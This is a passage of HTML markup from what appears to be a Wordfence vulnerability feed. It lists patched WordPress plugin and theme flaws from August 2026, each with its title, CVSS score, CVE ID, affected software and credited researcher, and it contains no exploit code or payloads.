<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/huseyn" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/c91011e314f83633b3cbb16f20ce60b9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c91011e314f83633b3cbb16f20ce60b9"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/huseyn" target="_blank" rel="noopener">Huseyn</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d61ae924-6ded-4930-a1fa-ca08d46bf8b9" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3a0ef5d4-2bea-4e7f-9c18-9a06d30e18f5" target="_blank" rel="noopener">Affiliate Program Suite — SliceWP Affiliates &lt;= 1.2.10 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-82224" target="_blank" rel="noopener noreferrer">							CVE-2026-82224						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/slicewp" target="_blank" rel="noopener">Affiliate Program Suite — SliceWP Affiliates</a> <span class="wfvr-software-slug">[slicewp]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7965cd13376a540548ec7009cd66b05b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7965cd13376a540548ec7009cd66b05b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener">daroo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3a0ef5d4-2bea-4e7f-9c18-9a06d30e18f5" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/fb59b19e-7752-4f71-bb86-72f7028666b0" target="_blank" rel="noopener">Animation Addons for Elementor – GSAP Motion Elementor Addons &amp; Website Templates &lt; 2.7.2 &#8211; Unauthenticated Server-Side Request Forgery</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-17565" target="_blank" rel="noopener noreferrer">							CVE-2026-17565						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/animation-addons-for-elementor" target="_blank" rel="noopener">Animation Addons for Elementor – GSAP Motion Elementor Addons &amp; Website Templates</a> <span class="wfvr-software-slug">[animation-addons-for-elementor]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/seongwon-lee" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/8e196345806e141d3c31b5b5d8489ec0.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8e196345806e141d3c31b5b5d8489ec0"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/seongwon-lee" target="_blank" rel="noopener">Seongwon Lee</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/fb59b19e-7752-4f71-bb86-72f7028666b0" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a330336e-82ad-41f4-b1b1-d93d9905aabd" target="_blank" rel="noopener">Booking for Appointments and Events Calendar &lt;= 2.2 &#8211; Unauthenticated Stored Cross-Site Scripting via Customer Name Fields in Booking Submission</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-6286" target="_blank" rel="noopener noreferrer">							CVE-2026-6286						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ameliabooking" target="_blank" rel="noopener">Booking for Appointments and Events Calendar – Amelia</a> <span class="wfvr-software-slug">[ameliabooking]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/lucas-montes" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/391494aab21a49e63f502a6846e4de16.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="391494aab21a49e63f502a6846e4de16"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/lucas-montes" target="_blank" rel="noopener">Lucas Montes (NiRoX)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a330336e-82ad-41f4-b1b1-d93d9905aabd" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9b9e0cd2-ed09-4c27-a931-f492bdb3ca3a" target="_blank" rel="noopener">CozyStay &#8211; Hotel Booking WordPress Theme &lt;= 1.10.0 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-78289" target="_blank" rel="noopener noreferrer">							CVE-2026-78289						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 25, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/cozystay" target="_blank" rel="noopener">CozyStay &#8211; Hotel Booking WordPress Theme</a> <span class="wfvr-software-slug">[cozystay]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/g0053" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/0fdabee8f7d07866c3e86fca8d985ce7.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="0fdabee8f7d07866c3e86fca8d985ce7"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/g0053" target="_blank" rel="noopener">G0053</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9b9e0cd2-ed09-4c27-a931-f492bdb3ca3a" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/157ba92e-7dbe-4754-b9b9-20953d5a7896" target="_blank" rel="noopener">CP Media Player – Audio Player and Video Player &lt;= 1.3.0 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-78281" target="_blank" rel="noopener noreferrer">							CVE-2026-78281						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 25, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/audio-and-video-player" target="_blank" rel="noopener">CP Media Player – Audio Player and Video Player</a> <span class="wfvr-software-slug">[audio-and-video-player]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dutafi" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4e130f207b6dc84614b81d6d7fd4b475.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4e130f207b6dc84614b81d6d7fd4b475"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dutafi" target="_blank" rel="noopener">dutafi</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/157ba92e-7dbe-4754-b9b9-20953d5a7896" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d784afb0-03ca-48f8-ac21-230601c028a1" target="_blank" rel="noopener">Customer Reviews for WooCommerce &lt;= 5.106.0 &#8211; Unauthenticated Stored Cross-Site Scripting via Aggregated Review Form</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-6176" target="_blank" rel="noopener noreferrer">							CVE-2026-6176						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/customer-reviews-woocommerce" target="_blank" rel="noopener">Customer Reviews for WooCommerce</a> <span class="wfvr-software-slug">[customer-reviews-woocommerce]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7965cd13376a540548ec7009cd66b05b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7965cd13376a540548ec7009cd66b05b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener">daroo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d784afb0-03ca-48f8-ac21-230601c028a1" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/28644121-5473-4af4-9df0-669345f5812d" target="_blank" rel="noopener">Defender Security – Malware Scanner, Login Security &amp; Firewall &lt; 6.2.0 &#8211; Authenticated (Administrator+) Remote Code Execution</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-19225" target="_blank" rel="noopener noreferrer">							CVE-2026-19225						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/defender-security" target="_blank" rel="noopener">Defender Security – Malware Scanner, Login Security &amp; Firewall</a> <span class="wfvr-software-slug">[defender-security]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d36a048c5f4fe8795a861da6334611fa.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d36a048c5f4fe8795a861da6334611fa"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener">Jakub Herman</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/28644121-5473-4af4-9df0-669345f5812d" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/28114ca2-9730-4eb3-8977-a43c5b451e9b" target="_blank" rel="noopener">Dokan: AI Powered WooCommerce Multivendor Marketplace Solution – Build Your Own Amazon, eBay, Etsy &lt; 5.0.14 &#8211; Authenticated (Shop Manager+) Remote Code Execution</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-16576" target="_blank" rel="noopener noreferrer">							CVE-2026-16576						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/dokan-lite" target="_blank" rel="noopener">Dokan: AI Powered WooCommerce Multivendor Marketplace Solution – Build Your Own Amazon, eBay, Etsy</a> <span class="wfvr-software-slug">[dokan-lite]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/khaled-alenazi-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/dacc17a271a6378d63177b8dbe4c6a05.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="dacc17a271a6378d63177b8dbe4c6a05"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/khaled-alenazi-2" target="_blank" rel="noopener">Khaled Alenazi</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/28114ca2-9730-4eb3-8977-a43c5b451e9b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/13bf0f76-0375-432b-9f67-21f9bfefcdde" target="_blank" rel="noopener">Email Essentials &lt;= 6.0.6 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-81764" target="_blank" rel="noopener noreferrer">							CVE-2026-81764						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/email-essentials" target="_blank" rel="noopener">Email Essentials</a> <span class="wfvr-software-slug">[email-essentials]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/junhee-cho" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/e11f235d878446888d690cc5ba93c3ba.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e11f235d878446888d690cc5ba93c3ba"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/junhee-cho" target="_blank" rel="noopener">JunHee CHO</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/13bf0f76-0375-432b-9f67-21f9bfefcdde" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ca139d90-c634-4b87-ac82-2d340e06b309" target="_blank" rel="noopener">Email Subscribers &amp; Newsletters – Email Marketing, Post Notifications &amp; Newsletter Plugin for WordPress &lt;= 5.9.33 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-81290" target="_blank" rel="noopener noreferrer">							CVE-2026-81290						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/email-subscribers" target="_blank" rel="noopener">Email Subscribers &amp; Newsletters – Email Marketing, Post Notifications &amp; Newsletter Plugin for WordPress</a> <span class="wfvr-software-slug">[email-subscribers]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jiemook" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/6c02c2a9a8f148c260a3f7b0e64cd4fd.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="6c02c2a9a8f148c260a3f7b0e64cd4fd"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jiemook" target="_blank" rel="noopener">Jiemook</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ca139d90-c634-4b87-ac82-2d340e06b309" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/66901221-c2be-47a8-a50c-1302ee5bfac1" target="_blank" rel="noopener">Fluent Boards Pro &lt;= 2.0.11 &#8211; Authenticated (Editor+) Arbitrary File Upload</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-78274" target="_blank" rel="noopener noreferrer">							CVE-2026-78274						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 26, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/fluent-boards-pro" target="_blank" rel="noopener">Fluent Boards Pro</a> <span class="wfvr-software-slug">[fluent-boards-pro]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/66901221-c2be-47a8-a50c-1302ee5bfac1" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bf3874b1-f67a-4013-ae17-0e516af99b2d" target="_blank" rel="noopener">FluentCRM Pro &lt;= 3.1.12 &#8211; Authenticated (Editor+) Privilege Escalation</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-78271" target="_blank" rel="noopener noreferrer">							CVE-2026-78271						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 25, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/fluentcampaign-pro" target="_blank" rel="noopener">FluentCRM PRO</a> <span class="wfvr-software-slug">[fluentcampaign-pro]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bf3874b1-f67a-4013-ae17-0e516af99b2d" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f03b09ad-257c-48c9-8ecc-36f60f178f80" target="_blank" rel="noopener">Formidable Forms &lt;= 6.33.1 &#8211; Unauthenticated Stored Cross-Site Scripting via &#8216;frm_user_id&#8217; Parameter</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-18331" target="_blank" rel="noopener noreferrer">							CVE-2026-18331						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 25, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/formidable" target="_blank" rel="noopener">Formidable Forms – WordPress Form Builder for Contact Forms, Calculators, Quizzes &amp; More</a> <span class="wfvr-software-slug">[formidable]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7965cd13376a540548ec7009cd66b05b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7965cd13376a540548ec7009cd66b05b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener">daroo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f03b09ad-257c-48c9-8ecc-36f60f178f80" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/fcae7cb5-d333-4bde-a43b-ea3ef3b023fa" target="_blank" rel="noopener">Forminator Forms – Contact Form, Payment Form &amp; Custom Form Builder &lt; 1.57.0.5 &#8211; Authenticated (Administrator+) Remote Code Execution</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-19221" target="_blank" rel="noopener noreferrer">							CVE-2026-19221						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
